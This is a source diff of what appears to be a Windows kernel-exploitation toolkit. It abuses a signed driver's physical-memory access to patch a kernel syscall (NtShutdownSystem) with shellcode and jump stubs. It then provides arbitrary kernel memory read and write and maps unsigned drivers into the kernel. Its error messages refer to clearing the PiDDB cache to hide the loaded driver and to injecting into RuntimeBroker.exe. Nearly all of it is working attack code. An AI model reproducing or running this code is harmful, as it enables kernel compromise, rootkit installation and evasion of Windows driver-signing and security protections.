static const auto p_inh = reinterpret_cast<PIMAGE_NT_HEADERS>((LPBYTE)ntoskrnl_module + p_idh->e_lfanew);
if (p_inh->Signature != IMAGE_NT_SIGNATURE)
return { {}, {} };
const auto pattern_view =
std::string_view
{
reinterpret_cast<char*>(ntoskrnl_module),
p_inh->OptionalHeader.SizeOfImage
};
std::array<std::pair<char, char>, pattern_length - 1> pattern{};
for (std::size_t index = 0; index < pattern_length - 1; index++)
pattern[index] = { signature[index], mask[index] };
auto resultant_address = std::search
(
pattern_view.cbegin(),
pattern_view.cend(),
pattern.cbegin(),
pattern.cend(),
[](char left, std::pair<char, char> right) -> bool {
return (right.second == '?' || left == right.first);
});
const auto found_address =
resultant_address == pattern_view.cend() ? 0 :
reinterpret_cast<std::uintptr_t>(resultant_address.operator->());
const auto rva = found_address - reinterpret_cast<std::uintptr_t>(ntoskrnl_module);
return { found_address, rva };
}
}
}

@ -1,10 +1,13 @@
#include "vdm_ctx.h"
#include "vdm_ctx.hpp"
namespace vdm
{
vdm_ctx::vdm_ctx()
vdm_ctx::vdm_ctx(read_phys_t& read_func, write_phys_t& write_func)
:
read_phys(read_func),
write_phys(write_func)
{
// if we already found the syscall's physical page...
// already found the syscall's physical page...
if (vdm::syscall_address.load())
return;
@ -34,9 +37,37 @@ namespace vdm
search_thread.join();
}
void vdm_ctx::set_read(read_phys_t& read_func)
{
this->read_phys = read_func;
}
void vdm_ctx::set_write(write_phys_t& write_func)
{
this->write_phys = write_func;
}
bool vdm_ctx::rkm(void* dst, void* src, std::size_t size)
{
static const auto ntoskrnl_memcpy =
util::get_kmodule_export("ntoskrnl.exe", "memcpy");
return this->syscall<decltype(&memcpy)>(
ntoskrnl_memcpy, dst, src, size);
}
bool vdm_ctx::wkm(void* dst, void* src, std::size_t size)
{
static const auto ntoskrnl_memcpy =
util::get_kmodule_export("ntoskrnl.exe", "memcpy");
return this->syscall<decltype(&memcpy)>(
ntoskrnl_memcpy, dst, src, size);
}
void vdm_ctx::locate_syscall(std::uintptr_t address, std::uintptr_t length) const
{
const auto page_data =
const auto page_data =
reinterpret_cast<std::uint8_t*>(
VirtualAlloc(
nullptr,
@ -49,7 +80,7 @@ namespace vdm
if (vdm::syscall_address.load())
break;
if (!vdm::read_phys(reinterpret_cast<void*>(address + page), page_data, PAGE_4KB))
if (!read_phys(reinterpret_cast<void*>(address + page), page_data, PAGE_4KB))
continue;
// check the first 32 bytes of the syscall, if its the same, test that its the correct
@ -60,7 +91,6 @@ namespace vdm
reinterpret_cast<void*>(
address + page + nt_page_offset));
}
VirtualFree(page_data, PAGE_4KB, MEM_DECOMMIT);
}
@ -81,11 +111,11 @@ namespace vdm
std::uint8_t orig_bytes[sizeof shellcode];
// save original bytes and install shellcode...
vdm::read_phys(syscall_addr, orig_bytes, sizeof orig_bytes);
vdm::write_phys(syscall_addr, shellcode, sizeof shellcode);
read_phys(syscall_addr, orig_bytes, sizeof orig_bytes);
write_phys(syscall_addr, shellcode, sizeof shellcode);
auto result = reinterpret_cast<NTSTATUS(__fastcall*)(void)>(proc)();
vdm::write_phys(syscall_addr, orig_bytes, sizeof orig_bytes);
write_phys(syscall_addr, orig_bytes, sizeof orig_bytes);
syscall_mutex.unlock();
return result == STATUS_SUCCESS;
}

@ -5,28 +5,35 @@
#include <thread>
#include <atomic>
#include <mutex>
#include <functional>
#include "../vdm/vdm.hpp"
namespace vdm
{
// change this to whatever you want :^)
constexpr std::pair<const char*, const char*> syscall_hook = { "NtShutdownSystem", "ntdll.dll" };
inline std::atomic<bool> is_page_found = false;
inline std::atomic<void*> syscall_address = nullptr;
inline std::uint16_t nt_page_offset;
inline std::uint32_t nt_rva;
inline std::uint8_t* ntoskrnl;
using read_phys_t = std::function<decltype(vdm::read_phys)>;
using write_phys_t = std::function<decltype(vdm::write_phys)>;
class vdm_ctx
{
public:
vdm_ctx();
explicit vdm_ctx(read_phys_t& read_func, write_phys_t& write_func);
void set_read(read_phys_t& read_func);
void set_write(write_phys_t& write_func);
bool rkm(void* dst, void* src, std::size_t size);
bool wkm(void* dst, void* src, std::size_t size);
template <class T, class ... Ts>
__forceinline std::invoke_result_t<T, Ts...> syscall(void* addr, Ts ... args) const
{
static const auto proc =
static const auto proc =
GetProcAddress(
LoadLibraryA(syscall_hook.second),
syscall_hook.first
@ -46,12 +53,12 @@ namespace vdm
std::uint8_t orig_bytes[sizeof jmp_code];
*reinterpret_cast<void**>(jmp_code + 6) = addr;
vdm::read_phys(vdm::syscall_address.load(), orig_bytes, sizeof orig_bytes);
read_phys(vdm::syscall_address.load(), orig_bytes, sizeof orig_bytes);
// execute hook...
vdm::write_phys(vdm::syscall_address.load(), jmp_code, sizeof jmp_code);
write_phys(vdm::syscall_address.load(), jmp_code, sizeof jmp_code);
auto result = reinterpret_cast<T>(proc)(args ...);
vdm::write_phys(vdm::syscall_address.load(), orig_bytes, sizeof orig_bytes);
write_phys(vdm::syscall_address.load(), orig_bytes, sizeof orig_bytes);
syscall_mutex.unlock();
return result;
@ -60,35 +67,15 @@ namespace vdm
template <class T>
__forceinline auto rkm(std::uintptr_t addr) -> T
{
static const auto ntoskrnl_memcpy =
util::get_kmodule_export("ntoskrnl.exe", "memcpy");
T buffer;
this->syscall<decltype(&memcpy)>(
ntoskrnl_memcpy, &buffer, (void*)addr, sizeof T);
rkm((void*)&buffer, (void*)addr, sizeof T);
return buffer;
}
template <class T>
__forceinline void wkm(std::uintptr_t addr, const T& value)
__forceinline auto wkm(std::uintptr_t addr, const T& value) -> bool
{
static const auto ntoskrnl_memcpy =
util::get_kmodule_export("ntoskrnl.exe", "memcpy");
this->syscall<decltype(&memcpy)>(
ntoskrnl_memcpy, (void*)addr, &value, sizeof T);
}
__forceinline auto get_virtual(std::uintptr_t addr) -> std::uintptr_t
{
static const auto ntoskrnl_get_virtual =
util::get_kmodule_export(
"ntoskrnl.exe",
"MmGetVirtualForPhysical");
return this->syscall<MmGetVirtualForPhysical>(
ntoskrnl_get_virtual, addr);
return wkm((void*)addr, (void*)&value, sizeof T);
}
__forceinline auto get_peprocess(std::uint32_t pid) -> PEPROCESS
@ -106,8 +93,23 @@ namespace vdm
);
return peproc;
}
__forceinline auto get_virtual(std::uintptr_t addr) -> std::uintptr_t
{
static const auto ntoskrnl_get_virtual =
util::get_kmodule_export(
"ntoskrnl.exe",
"MmGetVirtualForPhysical");
return this->syscall<MmGetVirtualForPhysical>(
ntoskrnl_get_virtual, addr);
}
private:
void locate_syscall(std::uintptr_t begin, std::uintptr_t end) const;
bool valid_syscall(void* syscall_addr) const;
read_phys_t read_phys;
write_phys_t write_phys;
};
}

Binary file not shown.

@ -20,10 +20,10 @@ int __cdecl main(int argc, char** argv)
(
driver_data.data(),
driver_data.size(),
nullptr
nullptr // you can pass your structure here...
);
std::printf("[+] driver mapping result -> 0x%x\n", result);
std::printf("[+] driver mapping result -> 0x%x (0 == STATUS_SUCCESS)\n", result);
std::printf("[+] driver base address (usermode) -> 0x%p\n", driver_base);
std::getchar();
}

@ -7,13 +7,14 @@ namespace mapper
{
enum class mapper_error
{
error_success = 0x000, // everything is good!
image_invalid = 0x111, // the driver your trying to map is invalid (are you importing things that arent in ntoskrnl?)
load_error = 0x222, // unable to load signed driver into the kernel (are you running as admin?)
unload_error = 0x333, // unable to unload signed driver from kernel (are all handles to this driver closes?)
piddb_fail = 0x444, // piddb cache clearing failed... (are you using this code below windows 10?)
init_failed = 0x555, // setting up library dependancies failed!
failed_to_create_proc = 0x777 // was unable to create a new process to inject driver into! (RuntimeBroker.exe)
error_success, // everything is good!
image_invalid, // the driver your trying to map is invalid (are you importing things that arent in ntoskrnl?)
load_error, // unable to load signed driver into the kernel (are you running as admin?)
unload_error, // unable to unload signed driver from kernel (are all handles to this driver closes?)
piddb_fail, // piddb cache clearing failed... (are you using this code below windows 10?)
init_failed, // setting up library dependancies failed!
failed_to_create_proc, // was unable to create a new process to inject driver into! (RuntimeBroker.exe)
set_mgr_failure // unable to stop working set manager thread... this thread can cause issues with PTM...
};
/// <summary>
@ -23,5 +24,5 @@ namespace mapper
/// <param name="image_size">size of the driver buffer</param>
/// <param name="entry_data">data to be sent to the entry point of the driver...</param>
/// <returns>status of the driver being mapped, and base address of the driver...</returns>
std::pair<mapper_error, void*> map_driver(std::uint8_t* drv_image, std::size_t image_size, void** entry_data);
auto map_driver(std::uint8_t* drv_image, std::size_t image_size, void** entry_data) -> std::pair<mapper_error, void*>;
}
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